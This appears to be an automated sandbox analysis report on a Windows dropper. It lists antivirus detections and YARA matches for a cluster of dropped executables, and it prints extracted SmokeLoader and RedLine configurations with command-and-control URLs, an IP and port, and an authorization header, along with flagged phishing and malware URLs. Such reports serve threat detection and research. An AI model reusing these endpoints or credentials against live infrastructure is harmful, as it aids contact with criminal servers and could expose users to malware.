                  Source: http://wfsdragon.ru/api/setStats.php | Avira URL Cloud: Label: phishing
                  Source: http://camasirx.com/upload/ | Avira URL Cloud: Label: phishing
                  Source: https://t.gogamec.com:443/2302/sqlite.date.dat | Avira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_2 | Avira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_1 | Avira URL Cloud: Label: malware
                  Source: https://t.gogamec.com:443/2302/sqlite.dat02/sqlite.dat | Avira URL Cloud: Label: phishing
                  Source: http://hsiens.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=139 | Avira URL Cloud: Label: phishing
                  Source: https://niemannbest.me | Avira URL Cloud: Label: malware
                  Source: https://t.gogamec.com//y | Avira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_7 | Avira URL Cloud: Label: malware
                  Source: https://t.gogamec.com/2302/sqlit.~ | Avira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_4 | Avira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_3 | Avira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_6 | Avira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_5 | Avira URL Cloud: Label: malware
                  Source: http://hsiens.xyz/ | Avira URL Cloud: Label: phishing
                  Source: https://t.gogamec.com:443/2302/sqlite.dats://t.gogamec.com/2302/sqlite.dat | Avira URL Cloud: Label: phishing
                  Source: https://t.gogamec.com/2302/sqlite.dat&r3 | Avira URL Cloud: Label: malware
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe | Avira: detection malicious, Label: HEUR/AGEN.1312411
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Avira: detection malicious, Label: TR/ATRAPS.Gen
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | Avira: detection malicious, Label: HEUR/AGEN.1323370
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe | Avira: detection malicious, Label: HEUR/AGEN.1316578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe | Avira: detection malicious, Label: HEUR/AGEN.1311469
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe | Avira: detection malicious, Label: TR/Redcap.vadxp
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | Avira: detection malicious, Label: HEUR/AGEN.1316578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | Avira: detection malicious, Label: HEUR/AGEN.1316578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Avira: detection malicious, Label: HEUR/AGEN.1305985
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Avira: detection malicious, Label: HEUR/AGEN.1318610
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Avira: detection malicious, Label: HEUR/AGEN.1323370
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exE | Avira: detection malicious, Label: TR/Redcap.vadxp
                  Source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2020, "C2 list": ["http://lecanardstsornin.com/upload/", "http://m3600.com/upload/", "http://camasirx.com/upload/"]}
                  Source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "135.181.129.119:4805", "Bot Id": "she", "Authorization Header": "b69102cdbd4afe2d3159f88fb6dac731"}
                  Source: gmpeople.com | Virustotal: Detection: 11%
                  Source: wfsdragon.ru | Virustotal: Detection: 9%
                  Source: hsiens.xyz | Virustotal: Detection: 11%
                  Source: t.gogamec.com | Virustotal: Detection: 13%
                  Source: topniemannpickshop.cc | Virustotal: Detection: 12%
                  Source: buy-fantasy-football.com.sg | Virustotal: Detection: 10%
                  Source: all-mobile-pa1ments.com.mx | Virustotal: Detection: 11%
                  Source: niemannbest.me | Virustotal: Detection: 10%
                  Source: ggg-cl.biz | Virustotal: Detection: 9%
                  Source: https://all-mobile-pa1ments.com.mx/ | Virustotal: Detection: 10%
                  Source: http://lecanardstsornin.com/upload/ | Virustotal: Detection: 11%
                  Source: http://wfsdragon.ru/api/setStats.php | Virustotal: Detection: 11%
                  Source: http://45.9.20.13/partner/loot.php?pub=mixone8 | Virustotal: Detection: 6%
                  Source: http://wfsdragon.ru/ | Virustotal: Detection: 9%
                  Source: https://topniemannpickshop.cc | Virustotal: Detection: 13%
                  Source: http://camasirx.com/upload/ | Virustotal: Detection: 12%
                  Source: https://niemannbest.me/?username=p11_1 | Virustotal: Detection: 13%
                  Source: https://niemannbest.me/?username=p11_2 | Virustotal: Detection: 12%
                  Source: http://hsiens.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=139 | Virustotal: Detection: 14%
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exE | ReversingLabs: Detection: 57%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | ReversingLabs: Detection: 68%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe | ReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | ReversingLabs: Detection: 92%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | ReversingLabs: Detection: 80%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe | ReversingLabs: Detection: 80%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | ReversingLabs: Detection: 84%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe | ReversingLabs: Detection: 65%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | ReversingLabs: Detection: 84%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe | ReversingLabs: Detection: 57%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | ReversingLabs: Detection: 88%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | ReversingLabs: Detection: 88%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurl.dll | ReversingLabs: Detection: 13%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dll | ReversingLabs: Detection: 18%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libstdc++-6.dll | ReversingLabs: Detection: 47%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | ReversingLabs: Detection: 68%
                  Source: C:\Users\user\AppData\Local\Temp\r6f7sE.I | ReversingLabs: Detection: 73%
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | ReversingLabs: Detection: 68%
                  Source: C:\Users\user\AppData\Roaming\bgjifes | ReversingLabs: Detection: 88%
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | ReversingLabs: Detection: 71%
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Virustotal: Detection: 68%
                  Source: Yara match | File source: 19.0.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 19.2.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.3.setup_installer.exe.320451a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.3.setup_installer.exe.320451a.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.3.setup_installer.exe.31d6d4a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: setup_installer.exe PID: 7608, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: Mon17c604381c7047e.exe PID: 7940, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, type: DROPPED
                  Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Joe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | Joe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe | Joe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe | Joe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe | Joe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | Joe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | Joe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Joe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Joe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exE | Joe Sandbox ML: detected
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Joe Sandbox ML: detected

                  Compliance

                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe | Unpacked PE file: 26.2.Mon1785436ae78.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | Unpacked PE file: 29.2.Mon179e1058f256.exe.400000.0.unpack
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknown | HTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.4:59938 version: TLS 1.0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49736 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:59963 version: TLS 1.2
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4154945181.00000000018D4000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbeH source: Mon179e1058f256.exe, 0000001D.00000002.4154945181.0000000001895000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\neyicuyim\povig_bum_j.pdbpEp source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000000.1719311767.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, Mon179e1058f256.exe.1.dr
                  Source: Binary string: -C:\wuye\yajiwixifava\jayawoduta_jeyifucanor\kuhitoguzepuwu\bi.pdbpE source: setup_installer.exe, 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000000.1716147888.0000000000401000.00000020.00000001.01000000.00000016.sdmp, Mon1785436ae78.exe.1.dr
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17e1fac3fd3d84b.exe, 00000015.00000002.1815283502.0000000000118000.00000002.00000001.01000000.00000010.sdmp, Mon17e1fac3fd3d84b.exe, 00000015.00000000.1712134912.0000000000118000.00000002.00000001.01000000.00000010.sdmp, 09xU.exE, 00000026.00000000.1793041267.0000000000748000.00000002.00000001.01000000.00000020.sdmp, 09xU.exE, 00000026.00000002.1956857652.0000000000748000.00000002.00000001.01000000.00000020.sdmp, Mon17e1fac3fd3d84b.exe.1.dr
                  Source: Binary string: em.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BDD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4146627363.0000000000194000.00000004.00000010.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4147052566.00000000008F7000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: D:\workspace\workspace_c\shellcode_ms\SCY7VJ5UA3Du3GAh1_jm1\x64\Release\SCY7VJ5UA3Du3GAh1_jm1.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\neyicuyim\povig_bum_j.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000000.1719311767.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, Mon179e1058f256.exe.1.dr
                  Source: Binary string: C:\projects\controlzex\src\ControlzEx\obj\Release\NET45\ControlzEx.pdbL source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000000.1714670479.00000000009EC000.00000002.00000001.01000000.00000013.sdmp, Mon17b5f403be4d8d6b.exe.1.dr
                  Source: Binary string: C:\tabosamifoma60\cukatopeh.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17f45359eb9.exe, 00000018.00000002.1984751493.0000000000409000.00000020.00000001.01000000.00000014.sdmp, Mon17f45359eb9.exe, 00000018.00000000.1714843560.0000000000401000.00000020.00000001.01000000.00000014.sdmp, bgjifes.47.dr, Mon17f45359eb9.exe.1.dr
                  Source: Binary string: ?C:\tabosamifoma60\cukatopeh.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17f45359eb9.exe, 00000018.00000002.1984751493.0000000000409000.00000020.00000001.01000000.00000014.sdmp, Mon17f45359eb9.exe, 00000018.00000000.1714843560.0000000000401000.00000020.00000001.01000000.00000014.sdmp, bgjifes.47.dr, Mon17f45359eb9.exe.1.dr
                  Source: Binary string: System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000BAC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\wuye\yajiwixifava\jayawoduta_jeyifucanor\kuhitoguzepuwu\bi.pdb source: setup_installer.exe, 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000000.1716147888.0000000000401000.00000020.00000001.01000000.00000016.sdmp, Mon1785436ae78.exe.1.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdbtZrq source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb3t source: Mon179e1058f256.exe, 0000001D.00000002.4154945181.0000000001895000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\projects\controlzex\src\ControlzEx\obj\Release\NET45\ControlzEx.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000000.1714670479.00000000009EC000.00000002.00000001.01000000.00000013.sdmp, Mon17b5f403be4d8d6b.exe.1.dr

                  Spreading

                  Source: Yara match | File source: 1.3.setup_installer.exe.31a1c46.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.3.setup_installer.exe.31a1c46.7.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 23.0.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 23.2.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000003.1691383572.00000000031A1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe, type: DROPPED
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Code function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, | 0_2_00405C4E
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Code function: 0_2_00402902 FindFirstFileW, | 0_2_00402902
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Code function: 0_2_0040689A FindFirstFileW,FindClose, | 0_2_0040689A
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Code function: 1_2_00404B47 FindFirstFileW, | 1_2_00404B47
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | File opened: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | File opened: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libstdc++-6.dll
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | File opened: C:\Users\user\
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | File opened: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libwinpthread-1.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_004995D0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then sub esp, 1Ch | 2_2_00492160
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_00410260
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push edi | 2_2_004622C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push edi | 2_2_004622C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push ebx | 2_2_004622C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push edi | 2_2_0042A3F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push esi | 2_2_00488620
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then sub esp, 1Ch | 2_2_00464714
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then sub esp, 1Ch | 2_2_00426733
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push ebp | 2_2_0045E864
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push ebp | 2_2_00446B30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040EB90
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040EC20
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040ECB1
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040ED09
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040EDC9
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040EDF3
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push ebp | 2_2_00420D80
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push ebp | 2_2_00454D80
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040ED90
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040EE0C
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040EE30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040EEC0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040EF40
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040EFC5
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040EFF0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040EF90
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then sub esp, 1Ch | 2_2_0041D050
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then sub edx, 01h | 2_2_0041D030
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then mov eax, dword ptr [ecx] | 2_2_0042B0E0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040F1C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then sub esp, 1Ch | 2_2_004751F4
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then mov dword ptr [ecx], 004AB654h | 2_2_0047D1F2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push ebx | 2_2_00471267
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040F269
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push ebx | 2_2_0047136B
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0041144C
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040F42C
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push ebp | 2_2_0047143A
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_00411490
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040F4A0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040F5E0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then mov dword ptr [ecx], 004AB688h | 2_2_0047D5F3
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push edi | 2_2_00481590
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then jmp 004014E0h | 2_2_0040F650
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then mov eax, dword ptr [ecx] | 2_2_00421630
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 4x nop then push esi | 2_2_00485750
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebp2_2_00473794
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040F850
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040F9D0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then mov dword ptr [ecx], 004AB6BCh2_2_0047D9F2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040FA29
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebp2_2_00465AD2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040DB40
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push edi2_2_00421BA0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040DCC0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040FE40
